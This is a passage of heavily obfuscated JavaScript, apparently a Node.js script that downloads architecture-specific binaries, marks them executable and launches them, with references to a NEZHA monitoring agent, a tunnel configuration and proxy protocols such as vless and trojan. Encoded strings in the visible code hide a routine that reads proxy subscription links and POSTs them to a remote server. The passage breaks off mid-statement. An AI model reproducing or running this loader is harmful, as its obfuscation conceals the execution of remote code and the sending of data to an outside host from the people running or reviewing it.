'uxLhy0i','ChDztwy','yMjJz1i','yMXHy2TOB2XL','C2vFAxb2nL9JBW','DhjPBq','z1rJweW','CvjVAxm','v3nIBfe','vwLSBuq','oIbMywXZzqP1Dq','B2j0ywLUiefYzW','z2jWweu','EuDtBM8','zxzywMu','zxLkAeLQB2Lzva','Dg9tDhjPBMC','s1vMqva','C25Ppq','z21dq1K','tw1rD01QqxDova','tw1nCNq','wLzmtKu','Dhj1zq','BKPTsKS','BwPSA1C','vMfwAKS','CMvZCg9UC2u','ls1ZA2LWlwnVBG','mtG3lwi0y2u4nG','BcaYpIyXicy','D3ntzxr0Aw5NCW','cMrPC2fIBgvFzG','ChjVDg90ExbL','yM9VDc5SB2C','wxrAref6twKWma','mJa0ntu2mvLyCxv5rG','yxbWBgLJyxrPBW','igLZihj1BM5PBG','BxLNwMq','A3PiB2e','rhjVrg8','qxbWigLZihj1BG','y3vYBcaTC20Gnq','we53vvu','B3v0yM91BMrZ','qvvsvhK','qNvAzhO','rg93BMXVywqG','yKDstuC','u3Hhs0i','C0fZuhG','DM1LC3m','rhfUv1e','DxjS','sMvWs3q','AxngAwXL','jMzWpwzPCMvMBW','Dw5UzwXtzwnYzq','ELzjvKW','tLfjrhy','A25pCvq','DxrMltG','rMTAALu1wMPfmW','rwrxz3y','zMfSBgjHy2TZ','B2C6','BIaTlxnRAxaTCa','Dg1nt2G','txb2uge','u01Vy1e','s2fvAuu','wwD1DKO','A29OqM8','B0PKzva','Bg9HzgLUzYbMAq','DgfIBgu','y2nLC3nMDwXSEq','B28UC2vYDJaWlG','wMrWuMS','cIaGy3jLzgvUDa','igzHAwXLzdOG','p3nLy3vYAxr5pq','Dgv4Dc9WBgfPBG','A2XTBM9WCxjZDa','re5UCMu','ywXWBG','x19WCM90B19F','q2L0zgi','refowKu','Dc1KzwXHEsa0ia','iIa+ic9KzxyVBG','DwukAxbFCMvWBW','y2rUCY5KB29UlG','DcWGzw5QB3KH','ic0TzgLZywjSzq','B3zsC3C','sLvdu04','CuDUt2q','ywnJzxnZihrHCW','jNbHDgG9jtjgDG','zM9YrwfJAa','ueHltKm','AhjAtNa','ExvuEvG','DM9Kz3O','ztOGzMfSC2ukDq','zMXVB3i','BNbTihj1BM5PBG','zvjPALG','zxHJzxb0Aw9U','n2iWltq0nZyTyq','BcbYDw4','qNbPzeu','C3vIC3rYAw5N','yMXLigLZigvTCa','DhzfwNq','zw52','C3rHDfn5BMm','EhrSCY1YChj4lq','zwP4rhy','twTOvK0','Be5Ny3y','Cu1XDNC','EgLZDhm','zgvZDe92zxjYAq','A0TrCeG','rKjLuvu','DguGls1YzxbVCG','DMXXsLK','l251BgWGmJ4Mmq','vfPou2S','l3zSzxnZlwfYzW','sgLqu3y','Dgnby2i','wvPhz2y','D3jPDgvgAwXLuW','zM1Uuem','B0flwxq','y2PgCM4','qMrry0C','EwmUBw4VDJe','zxjYB3i','EtOGDhj1zqOGia','B24GDxbSB2fKzq','vvPTCu8','y291BNq6ihrYDq','DxjPDhK9DgXZjG','mtK5mtuZmfjLALHvDG','yw5KoIa','B3n0BMfTztOG','CxvPyW','rxjYB3iGzxHLyW','vxPxAw8','C3bSAxq','Cg9YDa','t2Lcrhy','CMfUzg9T','DxrPBa','igzHBhnLcMrPCW','txPKAe9estforW','B3rVy29SigH0Da','C3rHDhvZ','zun1rM8','C01by2m','Aw5JBhvKzxm','Cgf0Aa','EfzWDu8','tNbwCLm','vw5Oyw5KBgvKia','uMfzwfC','ENP6AxaUy2HSDW','v1rgt2fRvxPxvW','rgPTwfm','l3rYB2PHBI1HCG','y29UzMLNlMPZBW','EufxDxu','s0XzEMO','wvzpDMy','l2jVB3qUBg9Nia','CMvHzgrPCLn5BG','l2nVBMzPzY55yq','yMLUza','CMvHzezPBgvtEq','CM9JCYa+l2rLDG','Dg5Nrvi','Afz3tvC','CNrFzgvSyxK6ia','BxHZtNK','lwf1Dg8TDxbKyq','DgXZjNnUAt0','rxrjEwW','y2XVC2u','ywjSzsbPCYbLBq','ic1gxciGj3TWCG','ywrLzcbZDwnJzq','vMjMz2K','BdOVlZGUoc44lG','jtngzwqLm0qYnq','Aw5NCW','DhjHy2u','r0LZweq','Dgfsmuy0vdbsAW','zM9Yia','qwPfwNe','rwzbrem','Ahr0CcbZzxj2zq','CMvFDgXZoIb0CG','sMzYDNK','x3rVx3vWz3jHza','v0v0sxC','uwjWzM0','lNbWlNvH','qxvry2G','quLdCwW','D2LJEuK2swSXsa','C09vsfG','BgX5','DMXLC3m','tKfmrva','oGOGicaGicaGia','zhHVswC','ywLK','odq0mW','C2vJDxjPDhK','uvztrLG','Bwf0y2G','twT2y0y','zgvJCNLWDgLVBG','cIaGDhvUBMvSoG','DcbMywLSzwqGzG','uMPNs0K','y2HPBgrFChjVyW','zdy0lNnZC3mUBG','uLn6q3O','DwXSidi+jJe','DxjLoIbMywXZzq','B2TLBIa','yKXAy04','tKvAseeGDMfYAq','zgLrCxi','CgfZC3DVCMq','ig5VDcbMB3vUza','jde4FsCGFcbZzq','zMLSDgvY','s3vVsLa','yxbWBhK','AuzMCgu','Dw5SAw5Ru3LUyW','CNrFCgvYAw9KoG','CgHWihj1BM5PBG','p2vUy3j5ChrPBW','ywnJzxnZ','y0L2tey','DxrLoIbMywXZzq','wMjMsem','icaTihnLCNzPyW','Bgv2zwW','EKLPA0W','DgfN','ufHssLe','C2n5','vuHPwxO','Ahr0Chm6lY9HBq','sfL1D3e','D1nqv08','v0rvAva','sM1wCfC','A0z1Cha','ls1UBY1HDxrVDq','sgPwBvy','shzlwKq','Dw50CNLFy29Kzq','y1veD0e','yxrLoIb0CNvLcG','zvDeuuq','BNq6ihrYDwukCW','vhvUBMvSu2vJCG','zgrPBMCGyxv0BW','Ahr0ChmRBg9Jyq','DxrPBMCGy29TBq','zqP0zw1WzxjHDa','CM0GlxjMia','z3HHqKm','Ahr0Chm6lY9HCG','Ag9ZDa','xY9NjW','sMnKq1G','DMTKDuC','y0HwvLm','BM9Kzxm','zgvZDa','sfPcr0q','zxuUB3jN','B1HXrK0','vM9bCxm','u1PJwgW','sMrrDNO','CgvLzc5JBg91za','vMfgAw4','vvbiAMC','DgXZ','C2ukz3b1oIbMyq','DurIEKe','CLLhEfq','zNjLzwrVBq','tvzev24','Aw5NigjVB3qUBa','Bwv0ysb8igf3AW','C3rYzwfTu2v0Da','ywjJzgvMz2HPAG','wvrJEgu','C25P','Dhfjtwm','zvjhv3a','CvjmEeK','B3iG','zw50igfYy2HPDa','y29UC3rYDwn0BW','zgDLlwLWlxzLCG','nJaJ','CdiGls1SB2DMAq','quXIwvq','odbPD3nMrfi','zxnZ','vxbfDLi','mti3lJaUmc4X','DMLJztOGAhr0Ca','cIaGcNzTzxnZoG','BZ9Lzd0YntyW','qwX3Evq','Cxjfq0y','rxjYB3iGzg93BG','DfjyBuy','Cg9ZDa','DwXSidi+jJeGjG','CxvLCNK6igzHBa','zvn0CMvHBq','cMnSAwvUDf9Zzq','BM5ht20','BhnLcMLUC2vJDq','zxHPC3rZu3LUyW','zgLZywjSzv9JBW','zgP1A0u','Bwv0ywrHDgfpBG','CMv0DxjUicHMDq'];_0x2c50=function(){return _0x4e5c89;};return _0x2c50();}async function downloadFilesAndRun(){const _0x37a2f3={'XAEtE':_0xf1b49b(0x329,0x50e,0x4f5,0x406),'HiPSv':'BohyZ','qdVTv':function(_0xad7f21,_0x222fb9){return _0xad7f21===_0x222fb9;},'EWcdN':_0xf1b49b(0x5f6,0x5e2,0x6a6,0x5a6),'OISgx':_0xf1b49b(0x553,0x568,0x597,0x4e6)+'m64.ssss.n'+_0x301e5c(-0xf4,-0x243,-0x14a,-0x27b),'JdQvz':_0x301e5c(-0x170,0x21,-0xd0,-0x194)+_0xf1b49b(0x351,0x450,0x4fd,0x4b3)+_0xf1b49b(0x319,0x596,0x426,0x457),'zkABT':_0xf1b49b(0x4ff,0x5b1,0x58f,0x55e)+'n','UpEvR':_0xf1b49b(0x4a4,0x4af,0x5e2,0x576),'zuqCO':_0xf1b49b(0x3ef,0x518,0x5df,0x500)+'klmnopqrst'+_0x301e5c(-0x385,-0x2db,-0x29a,-0x291),'UilmD':function(_0x287c5e,_0x2ae054){return _0x287c5e*_0x2ae054;},'YFLmO':_0x301e5c(-0x23b,-0x12c,-0x26d,-0x1d0),'IJZOL':_0xf1b49b(0x546,0x45c,0x46a,0x588),'qMqvw':function(_0x29f98c,_0x4a1ee2){return _0x29f98c!==_0x4a1ee2;},'oBqzK':_0xf1b49b(0x4aa,0x5d2,0x5ae,0x4bf),'YMEad':_0x301e5c(-0x2bb,-0xd9,-0x1e9,-0x32f),'ZbfHC':_0xf1b49b(0x45b,0x664,0x51d,0x52f),'emuvg':_0xf1b49b(0x437,0x58d,0x575,0x4a4),'vcpqE':_0x301e5c(-0x2d8,-0xb3,-0x1ee,-0x251)+'o','DyGJt':_0xf1b49b(0x3f7,0x44b,0x553,0x478)+'go','AURTy':_0xf1b49b(0x5c6,0x45b,0x482,0x590),'JZcyS':'127.0.0.1','yqVEP':_0x301e5c(-0x18,-0xef,-0x153,-0x215)+'o','yGSno':_0x301e5c(-0xce,-0x24b,-0x140,-0xf),'AarlD':_0xf1b49b(0x2d0,0x410,0x2f4,0x3fe),'EHyYo':_0xf1b49b(0x1f7,0x45b,0x4a1,0x33e),'MfEXz':_0x301e5c(-0x102,-0x126,-0xc0,-0x8e)+_0x301e5c(-0xff,-0x23,-0x112,-0x1e3)+'8/dns-quer'+'y','JWumo':_0xf1b49b(0x4e5,0x3fa,0x4a5,0x4fb),'RaYXW':_0xf1b49b(0x428,0x292,0x3a2,0x3a0),'rqQcM':_0x301e5c(-0x1c2,-0x19a,-0x1d4,-0x164),'Qbpfm':_0xf1b49b(0x1fc,0x3ab,0x39f,0x353),'nnGOm':'config.jso'+'n','YZGgf':function(_0x3adf98,_0x23367f){return _0x3adf98===_0x23367f;},'AICql':_0x301e5c(-0x122,0x41,-0xd0,-0xe8)+_0x301e5c(-0x23,0x1a,-0xee,-0x89)+_0x301e5c(0x83,-0x14,-0x7a,-0x13d)+'t','HjQuY':_0x301e5c(-0x2f2,-0x361,-0x246,-0x2a1)+'+$','uDbzA':_0x301e5c(-0x2ed,-0xc5,-0x184,-0x83)+';\x20charset='+'utf-8','oOSgy':_0xf1b49b(0x253,0x2a2,0x4ef,0x3b3)+_0x301e5c(-0x1a8,0x12,-0x8e,-0x164),'hWGSD':_0x301e5c(-0x29,-0xef,-0xaa,-0x62),'ovRsw':_0xf1b49b(0x421,0x467,0x482,0x387),'fMwKQ':_0xf1b49b(0x675,0x565,0x648,0x5c8),'bGRMG':function(_0x3f0da4,_0x1e29ea){return _0x3f0da4(_0x1e29ea);},'zOSZy':_0xf1b49b(0x5c9,0x581,0x4e4,0x473)+'error\x20in\x20s'+_0xf1b49b(0x23e,0x1ec,0x419,0x31c)+':','FiaKs':_0x301e5c(0xd9,0xe1,-0xe,0xf9)+_0x301e5c(-0x105,-0xe0,-0x114,-0x5e)+_0x301e5c(0x3a,-0x16e,-0x24,0x137),'TOxWR':function(_0x4725d5){return _0x4725d5();},'PvuSz':function(_0x17ddfc,_0x5b6884){return _0x17ddfc!==_0x5b6884;},'leiCN':_0xf1b49b(0x350,0x3c9,0x24f,0x2f4),'eWDQD':'HJFNY','HIbBR':function(_0x5007eb,_0x336487){return _0x5007eb(_0x336487);},'spfsE':function(_0x523d0d,_0x520b32){return _0x523d0d&&_0x520b32;},'mjthd':_0x301e5c(-0x157,0x56,-0x107,-0x39),'kFupp':_0x301e5c(-0x24a,-0x190,-0x257,-0x1ef),'tFJYr':_0xf1b49b(0x418,0x554,0x483,0x4a9),'diQqr':_0xf1b49b(0x6b6,0x680,0x64a,0x598),'mWFwY':'2053','RVCDv':_0xf1b49b(0x43e,0x215,0x47b,0x378),'Cygyo':_0xf1b49b(0x41d,0x252,0x33e,0x338)+'l','AbzgH':_0xf1b49b(0x403,0x4ff,0x649,0x501),'Ekqfu':_0xf1b49b(0x2ba,0x4a5,0x341,0x342),'ORwRi':'--tls','ujRZR':function(_0x2591e6,_0x698c10){return _0x2591e6===_0x698c10;},'qRois':_0xf1b49b(0x54c,0x43e,0x3bc,0x497),'dQWXv':_0xf1b49b(0x281,0x3dc,0x3b8,0x3b0),'tqIMc':_0xf1b49b(0x4e9,0x55f,0x521,0x43e),'drNte':'MBJUW','NHvvX':function(_0xe0c084,_0x29e5e0){return _0xe0c084(_0x29e5e0);},'ncxra':function(_0x2872e3,_0x168f77){return _0x2872e3!==_0x168f77;},'EtIyl':_0xf1b49b(0x4e0,0x61d,0x5c0,0x5ba),'NjMvD':_0xf1b49b(0x5ab,0x4e0,0x6f5,0x5a7),'oyUrP':_0x301e5c(0xac,-0x13,-0x75,-0x111)},_0x1bc78a=_0x37a2f3['TOxWR'](getSystemArchitecture);function _0xf1b49b(_0x15f9ac,_0x6946ae,_0x49a9c1,_0x3a522f){return _0x388b12(_0x15f9ac,_0x6946ae-0x15e,_0x49a9c1-0x169,_0x3a522f-0x203);}function _0x301e5c(_0x4ccb26,_0x1d0ab2,_0x3d1e4d,_0x2b0a87){return _0x4d5570(_0x4ccb26-0xc1,_0x3d1e4d- -0x5f0,_0x3d1e4d-0x44,_0x1d0ab2);}const _0x275f9e=_0x37a2f3[_0x301e5c(-0xe9,-0x28d,-0x1a6,-0x1bb)](getFilesForArchitecture,_0x1bc78a);if(_0x275f9e[_0x301e5c(0xe,0x63,-0x3e,-0x163)]===0x1510+0x2146+-0x3656){console[_0xf1b49b(0x25a,0x4d7,0x21b,0x379)]('Can\x27t\x20find'+_0x301e5c(-0x211,-0x1ba,-0x202,-0x158)+_0x301e5c(-0x16d,-0x178,-0xb,-0x11)+_0xf1b49b(0x5ff,0x5c0,0x50c,0x507)+_0x301e5c(-0x166,-0x231,-0x234,-0x187));return;}const _0x3e4837=_0x275f9e['map'](_0x1e5ad2=>{function _0x29b384(_0x5e0a51,_0x2b3ccf,_0x1b5ad8,_0x41fd1f){return _0xf1b49b(_0x5e0a51,_0x2b3ccf-0x13d,_0x1b5ad8-0xad,_0x41fd1f- -0xd4);}function _0x2faebf(_0x103746,_0x2e2b53,_0x377288,_0x843f7){return _0xf1b49b(_0x843f7,_0x2e2b53-0xa0,_0x377288-0x142,_0x2e2b53-0x1c);}const _0x5300d5={'BoHFB':_0x37a2f3[_0x2faebf(0x567,0x5b7,0x694,0x587)],'nchAN':function(_0x6c315b,_0x29df13){return _0x6c315b(_0x29df13);},'FGGjD':_0x37a2f3[_0x29b384(0x421,0x27e,0x35d,0x37b)]};return new Promise((_0x1dbd34,_0x47bb2e)=>{function _0x2e6c4d(_0x182e9e,_0x5ba01b,_0x2ab3c6,_0x164d8b){return _0x29b384(_0x164d8b,_0x5ba01b-0x17c,_0x2ab3c6-0x14d,_0x2ab3c6- -0x446);}function _0x6ad4f8(_0x5836f8,_0x46a37d,_0x4f807e,_0x2ddef3){return _0x2faebf(_0x5836f8-0x114,_0x46a37d- -0x192,_0x4f807e-0x39,_0x5836f8);}const _0x152474={'mSksT':_0x2e6c4d(-0x5,-0x52,-0x112,-0x265),'BMPSa':_0x2e6c4d(-0x2d,0x14c,0xae,0x109),'SxGKB':function(_0x55e014,_0x55abd6){return _0x55e014===_0x55abd6;},'DbYFD':_0x2e6c4d(-0x126,-0x1f7,-0x12b,-0x257)+_0x6ad4f8(0xf6,0x213,0x355,0x1f3),'AjEZq':function(_0x5bcbc5,_0xe34c6f,_0x15db20){return _0x5bcbc5(_0xe34c6f,_0x15db20);},'FJjRy':_0x5300d5[_0x6ad4f8(0x22e,0x1cf,0x1ed,0x225)],'HkwlW':function(_0x32301a,_0x1e5997){return _0x5300d5['nchAN'](_0x32301a,_0x1e5997);},'NeTHO':_0x5300d5['FGGjD'],'HYuwq':function(_0x467d10,_0x498098){function _0x10f8dd(_0x24c491,_0x15d924,_0x721ca,_0x5af299){return _0x2e6c4d(_0x24c491-0x67,_0x15d924-0x29,_0x721ca-0x5eb,_0x15d924);}return _0x5300d5[_0x10f8dd(0x634,0x757,0x666,0x786)](_0x467d10,_0x498098);}};downloadFile(_0x1e5ad2[_0x6ad4f8(0x2d4,0x1b3,0x7b,0xad)],_0x1e5ad2[_0x2e6c4d(-0x2ab,-0x1c5,-0x1a0,-0x16b)],(_0x3689d2,_0x16e1d5)=>{function _0x10854a(_0x28af72,_0x1f3c6a,_0x3e3b4d,_0x2cce85){return _0x6ad4f8(_0x2cce85,_0x3e3b4d- -0x417,_0x3e3b4d-0x9b,_0x2cce85-0x16);}function _0x28eca5(_0x4ecf0b,_0x4a9913,_0xbae22e,_0x48a340){return _0x2e6c4d(_0x4ecf0b-0x68,_0x4a9913-0x1f2,_0x4ecf0b-0x4ba,_0x4a9913);}const _0x315830={'wedqD':function(_0x1f9818,_0x20ad06,_0x51b7d7){function _0x5edb2f(_0x5cdd2d,_0x1b2be6,_0x35ef57,_0x15ad2d){return _0x4971(_0x5cdd2d- -0x204,_0x1b2be6);}return _0x152474[_0x5edb2f(0xd9,0x21f,-0x72,0x67)](_0x1f9818,_0x20ad06,_0x51b7d7);}};if(_0x3689d2){if(_0x152474[_0x28eca5(0x35c,0x489,0x4be,0x3d2)]!==_0x152474[_0x28eca5(0x35c,0x28b,0x200,0x375)]){if(!_0x265c06)return;if(!_0x322726[_0x10854a(-0x1a7,0x82,-0x6e,-0xdc)](_0x348975))return;let _0x4133fb;try{_0x4133fb=_0x51c980[_0x10854a(-0x10b,-0xf6,-0x10c,-0x220)+'nc'](_0x3f5525,_0x152474['mSksT']);}catch{return null;}const _0x2aa04f=_0x44a1c4[_0x10854a(-0x3ee,-0x1a3,-0x297,-0x198)](_0x4133fb,_0x152474['BMPSa'])[_0x28eca5(0x37a,0x232,0x232,0x3ec)](_0x152474[_0x10854a(-0x2e2,-0xb4,-0x1f3,-0x1de)]),_0x10497f=_0x2aa04f[_0x28eca5(0x404,0x2b7,0x484,0x3c3)]('\x0a')[_0x10854a(-0x1bb,-0x1bc,-0xcf,-0x190)](_0x5c18a5=>/(vless|vmess|trojan|hysteria2|tuic):\/\//[_0x28eca5(0x2ee,0x18f,0x344,0x459)](_0x5c18a5));if(_0x152474[_0x28eca5(0x39c,0x3b3,0x318,0x2ab)](_0x10497f[_0x10854a(-0xfe,0x6,-0x2a,-0x13f)],-0x26d5*-0x1+-0x4a*0x6f+-0x6bf*0x1))return;const _0x42225c={};_0x42225c[_0x10854a(-0xbd,-0x1c1,-0xa1,0x87)]=_0x10497f;const _0x3dc5a5={};_0x3dc5a5['Content-Ty'+'pe']=_0x152474[_0x28eca5(0x4ff,0x4b6,0x3f7,0x42d)];const _0x356ccb={};return _0x356ccb[_0x28eca5(0x560,0x45c,0x40b,0x51a)]=_0x3dc5a5,_0x23503a[_0x28eca5(0x4b8,0x568,0x587,0x3d4)](_0x4fc61c+(_0x28eca5(0x328,0x367,0x37f,0x2a5)+_0x28eca5(0x343,0x2c2,0x24c,0x346)),_0x48e22c[_0x10854a(0x8c,-0xac,0x36,0xc4)](_0x42225c),_0x356ccb)[_0x28eca5(0x521,0x58e,0x5e8,0x42e)](_0x126a94=>{return null;}),null;}else _0x152474[_0x28eca5(0x53e,0x5b2,0x417,0x44b)](_0x47bb2e,_0x3689d2);}else _0x152474[_0x28eca5(0x39c,0x2e3,0x3a7,0x502)](_0x152474[_0x28eca5(0x35e,0x31b,0x3ff,0x289)],_0x10854a(0x68,-0xe3,-0xa,0x12f))?(_0x5db818[_0x28eca5(0x42a,0x33f,0x4a0,0x3f3)](),_0x139435[_0x10854a(-0x216,-0xc2,-0x214,-0x152)](_0x10854a(-0x112,-0x21f,-0x193,-0xb0)+_0x1835a6['basename'](_0xf43b31)+(_0x28eca5(0x2db,0x401,0x2fa,0x30d)+_0x28eca5(0x443,0x375,0x458,0x389))),_0x315830[_0x10854a(-0x349,-0x26c,-0x28b,-0x3b4)](_0x3a58a9,null,_0x491c63)):_0x152474[_0x28eca5(0x472,0x382,0x36c,0x4e0)](_0x1dbd34,_0x16e1d5);});});});try{if(_0x37a2f3['PvuSz'](_0x37a2f3[_0xf1b49b(0x50a,0x277,0x4c2,0x3ba)],_0x37a2f3[_0x301e5c(-0x110,-0x1a6,-0x1e7,-0x329)])){const _0x1e362a=_0x37a2f3[_0x301e5c(-0x3a5,-0x230,-0x2b1,-0x290)](_0xad847,_0x37a2f3[_0xf1b49b(0x471,0x55a,0x6af,0x56b)])?_0x37a2f3[_0xf1b49b(0x563,0x51f,0x561,0x565)]:_0x37a2f3[_0xf1b49b(0x54c,0x401,0x4e1,0x4f3)],_0x4e3a60={};_0x4e3a60[_0xf1b49b(0x3f3,0x427,0x2f6,0x329)]=_0x49fd19,_0x4e3a60[_0x301e5c(-0x276,-0x172,-0x227,-0x328)]=_0x1e362a,_0x42f66c['unshift'](_0x4e3a60);}else await Promise[_0xf1b49b(0x3ec,0x4ef,0x5af,0x535)](_0x3e4837);}catch(_0x5b8f9e){if(_0x37a2f3[_0xf1b49b(0x64b,0x62e,0x494,0x4dd)]===_0x37a2f3[_0x301e5c(-0xf8,-0x1f1,-0xc4,-0xc)]){console['error'](_0xf1b49b(0x43f,0x437,0x5d1,0x516)+_0xf1b49b(0x321,0x473,0x2e4,0x415)+_0x301e5c(-0x2ad,-0x345,-0x240,-0x326),_0x5b8f9e);return;}else _0x2b7928['log'](_0xf1b49b(0x424,0x425,0x416,0x4b9)+'able\x20is\x20em'+_0x301e5c(-0x34e,-0x376,-0x216,-0x20f)+_0x301e5c(0x93,0x6e,0x29,-0x5a));}function _0x22d904(_0x524a94){function _0x10db61(_0x328ef7,_0x373aba,_0x1158ab,_0x1b6a4b){return _0x301e5c(_0x328ef7-0x54,_0x1b6a4b,_0x1158ab-0x378,_0x1b6a4b-0x1b9);}function _0x1cd5cf(_0x2cb981,_0x2a2b17,_0x231c71,_0x34e20c){return _0xf1b49b(_0x2cb981,_0x2a2b17-0x1ab,_0x231c71-0x1ca,_0x34e20c- -0x18b);}const _0x49f4e9={'RSzCz':_0x37a2f3[_0x10db61(0xe5,0x289,0x122,0x98)],'FBeQU':_0x37a2f3[_0x10db61(0x3a4,0x450,0x2e6,0x32e)],'ZPBLo':_0x37a2f3['zuqCO'],'cHVVS':function(_0x375253,_0x1182e5){function _0x483cf0(_0xad5024,_0x59b98e,_0x304f68,_0x3e6327){return _0x1cd5cf(_0x304f68,_0x59b98e-0xa7,_0x304f68-0x104,_0x59b98e-0x219);}return _0x37a2f3[_0x483cf0(0x2f7,0x461,0x414,0x39c)](_0x375253,_0x1182e5);},'lUFHV':function(_0x47f846,_0x252a55){return _0x37a2f3['qdVTv'](_0x47f846,_0x252a55);},'GIsXD':_0x37a2f3[_0x10db61(0x407,0x3dc,0x347,0x350)],'IPwxf':_0x37a2f3[_0x10db61(0x35a,0x393,0x343,0x3d1)],'evXZe':function(_0x5976ac,_0x1ebd1d){function _0x5ac9a4(_0x5aaee6,_0x4c0d2b,_0x243771,_0x45fa39){return _0x10db61(_0x5aaee6-0x68,_0x4c0d2b-0x16d,_0x243771- -0x16f,_0x4c0d2b);}return _0x37a2f3[_0x5ac9a4(0x87,0x8d,0xad,-0x5e)](_0x5976ac,_0x1ebd1d);},'hiIoV':_0x37a2f3[_0x1cd5cf(0x34f,0x53f,0x4d9,0x3d7)]},_0x428964=-0x79d+-0x75e+0x6*0x2d4;_0x524a94[_0x1cd5cf(0x215,0x169,0x148,0x2a4)](_0x11254f=>{function _0x2bf4ac(_0x4dd613,_0x2fc88d,_0x4d4eb2,_0x20b6c6){return _0x1cd5cf(_0x4d4eb2,_0x2fc88d-0x81,_0x4d4eb2-0x61,_0x20b6c6-0x1f6);}function _0x291626(_0x43264b,_0x21e023,_0x3bccc6,_0x2d573b){return _0x10db61(_0x43264b-0x17b,_0x21e023-0xb0,_0x3bccc6- -0x1c7,_0x43264b);}if(_0x49f4e9[_0x2bf4ac(0x5c6,0x723,0x723,0x5b9)]!==_0x291626(0x1c2,0x1ef,0xaf,-0x16)){if(fs[_0x2bf4ac(0x5e6,0x630,0x600,0x58a)](_0x11254f)){if(_0x49f4e9[_0x291626(-0x62,-0x13,-0x18,0x107)](_0x49f4e9[_0x291626(-0x1c7,-0x56,-0xfb,-0x1f5)],_0x49f4e9['hiIoV'])){_0x5222c5[_0x2bf4ac(0x3b2,0x5d8,0x385,0x4bd)+_0x2bf4ac(0x3f9,0x3c1,0x539,0x3ef)](_0x55c61e[_0x291626(0x135,0x42,0x136,0x11f)](_0xfd2f56,_0x49f4e9[_0x2bf4ac(0x51f,0x407,0x656,0x51f)]),_0x26d30c);const _0x2bd994='\x0a\x20\x20tunnel:'+'\x20'+_0x59da80[_0x2bf4ac(0x483,0x3c6,0x43d,0x4cf)]('\x22')[0xc13+0x22f1+0x39d*-0xd]+(_0x2bf4ac(0x5dd,0x567,0x521,0x485)+_0x291626(0x1bb,0xf2,0x1ba,0x8d)+'\x20')+_0x1417a0['join'](_0x131b00,_0x49f4e9[_0x291626(0x3c,-0xc,0xc4,0xfd)])+(_0x291626(0x169,0xb8,0x1b4,0x19e)+_0x291626(0x62,0x220,0x1c1,0x1ba)+_0x291626(0x20e,0x77,0x14b,0x4e)+_0x2bf4ac(0x557,0x5a1,0x571,0x60d)+_0x291626(-0x33,0x19,0x70,-0x96))+_0x95ac8a+(_0x291626(-0xd0,-0x88,-0x6f,0xb)+'vice:\x20http'+_0x291626(0x2d7,0x241,0x17e,0x5f)+_0x2bf4ac(0x44e,0x43b,0x444,0x3ab))+_0x1693a6+('\x0a\x20\x20\x20\x20\x20\x20ori'+'ginRequest'+_0x2bf4ac(0x660,0x42e,0x65c,0x511)+_0x291626(-0x74,-0x101,-0x5e,-0x10c)+_0x291626(0x1c7,0xd9,0x69,-0x1a)+_0x291626(0xd1,0x20f,0xda,0xe3)+'e:\x20http_st'+_0x2bf4ac(0x471,0x54e,0x492,0x3f5)+'\x20');_0x9b14d0['writeFileS'+'ync'](_0x59e6e3[_0x2bf4ac(0x620,0x47d,0x6eb,0x591)](_0x51336d,_0x49f4e9[_0x291626(-0xe5,-0x6f,0x59,0x19c)]),_0x2bd994);}else fs['chmod'](_0x11254f,_0x428964,_0x4d77f4=>{function _0x17b249(_0x283678,_0x5370b8,_0x5c2d1a,_0x3e872a){return _0x2bf4ac(_0x283678-0x46,_0x5370b8-0x10,_0x5370b8,_0x3e872a- -0x1c4);}function _0x553553(_0x960ecb,_0xf56d47,_0x24db60,_0x3414bc){return _0x2bf4ac(_0x960ecb-0x1ef,_0xf56d47-0x114,_0x3414bc,_0x24db60- -0x406);}const _0x32de0a={'igODl':_0x49f4e9['ZPBLo'],'qxHLz':function(_0x767c61,_0x50ad34){function _0x348ff0(_0x374a0f,_0x3e6c64,_0x42a9ef,_0x5e49aa){return _0x4971(_0x42a9ef-0xf9,_0x5e49aa);}return _0x49f4e9[_0x348ff0(0x34c,0x332,0x42b,0x50e)](_0x767c61,_0x50ad34);}};if(_0x4d77f4)console['error'](_0x17b249(0xfb,0x197,0x2f4,0x1d8)+_0x17b249(0x49c,0x482,0x3d7,0x357)+_0x553553(0x1db,0x17f,0x16b,0x15e)+_0x11254f+':\x20'+_0x4d77f4);else{if(_0x49f4e9[_0x553553(0x11e,0xaa,0x1a6,0x13e)](_0x49f4e9[_0x17b249(0x2fd,0x1f2,0x46f,0x33a)],_0x17b249(0x2ce,0x206,0x3da,0x2ae))){const _0x3aae9e=_0x32de0a[_0x17b249(0x160,0x20f,0x24f,0x20e)];let _0x10f83d='';for(let _0x45e1e3=-0x39b+0x246b*0x1+-0xa8*0x32;_0x45e1e3<-0xd93+-0x1*0x21f5+-0x2*-0x17c7;_0x45e1e3++){_0x10f83d+=_0x3aae9e['charAt'](_0x51b87a[_0x17b249(0x2b0,0x1c6,0x211,0x2dc)](_0x32de0a[_0x553553(0xed,0x7b,-0x45,-0x135)](_0x5bf27a[_0x553553(0x110,0x150,0xcc,0x20a)](),_0x3aae9e[_0x17b249(0x310,0x300,0x300,0x40a)])));}return _0x10f83d;}else console['log']('Empowermen'+_0x17b249(0x390,0x5a9,0x55e,0x463)+_0x553553(0x14d,0x192,0xfa,0x1a2)+_0x11254f+':\x20'+_0x428964['toString'](0x331*-0xb+-0xe2c+0x314f));}});}}else return'arm';});}const _0x297d55=NEZHA_PORT?[npmPath,webPath,botPath]:[phpPath,webPath,botPath];_0x37a2f3[_0xf1b49b(0x501,0x57b,0x47a,0x5b9)](_0x22d904,_0x297d55);if(_0x37a2f3[_0x301e5c(0x90,-0x135,0x8,-0x110)](NEZHA_SERVER,NEZHA_KEY)){if(!NEZHA_PORT){if(_0x37a2f3[_0xf1b49b(0x45f,0x4d8,0x529,0x580)]!==_0x301e5c(0x21,0x47,-0x107,-0xa7))_0x391357[_0xf1b49b(0x2f0,0x32b,0x508,0x458)]('Error\x20exec'+'uting\x20comm'+_0x301e5c(0x20,-0x123,-0x142,-0x4e)+_0x4feca1);else{const _0x1f7cc0=NEZHA_SERVER[_0x301e5c(-0x10b,-0xb5,-0x132,-0x72)](':')?NEZHA_SERVER[_0xf1b49b(0x449,0x4e3,0x3f2,0x464)](':')[_0xf1b49b(0x42e,0x57a,0x6da,0x599)]():'',_0x37adc1=new 